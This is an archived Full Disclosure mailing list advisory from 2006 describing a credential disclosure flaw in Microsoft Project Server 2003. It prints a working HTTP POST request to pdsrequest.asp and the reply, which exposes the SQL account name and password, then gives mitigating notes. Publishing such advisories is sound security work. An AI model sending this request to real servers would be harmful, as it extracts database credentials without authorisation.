Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Project Server 2003 - Credential Disclosure

From: "Brett Moore" <brett.moore () security-assessment com>
Date: Fri, 15 Dec 2006 12:09:05 +1300
==============================================================
% Project Server 2003 - Credential Disclosure
% brett.moore () security-assessment com
==============================================================

Microsoft Project server 2003 implements a thick client
for some of the functionality. The thick client uses
XML requests to talk to the server of HTTP(S).

One of these requests returns the username and password
of the MSProjectUser account used to access the SQL
database as well as other system information.

--------------------------------------------------------------
POST http://SERVER/projectserver/logon/pdsrequest.asp HTTP/1.0
Accept: */*
Accept-Language: en-nz
Pragma: no-cache
Host: SERVER
Content-length: 87
Proxy-Connection: Keep-Alive
Cookie: PjSessionID=<valid cookie>

<Request>
<GetInitializationData>
<Release>1</Release>
</GetInitializationData>
</Request>

<Reply>
<HRESULT>0</HRESULT>
<STATUS>0</STATUS>
<UserName>theuser</UserName>
<GetInitializationData>
<GetLoginInformation>
<DBType>0</DBType>
<DVR>{SQLServer}</DVR>
<DB>ProjectServer</DB>
<SVR>SERVER</SVR>
<ResGlobalID>1</ResGlobalID>
<ResGlobalName>resglobal</ResGlobalName>
<UserName>MSProjectUser</UserName>              <----
<Password>sekretpass</Password>                 <----
<UserNTAccount>SERVER\USER</UserNTAccount>
</GetLoginInformation>
</Reply>
--------------------------------------------------------------

Some quick notes that mitigate this attack;
* The cookie must be a valid cookie, which is obtained via a 
  login with a valid username and password.
* Since the thick client is 'client side' any sql can be 
  manipulated anyway.
* The MSProjectUser should be a low level account anyway
* Other 'undocumented' or 'unauthorised' requests 'may' also 
  be able to be made through this method.

==============================================================
% 
==============================================================

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: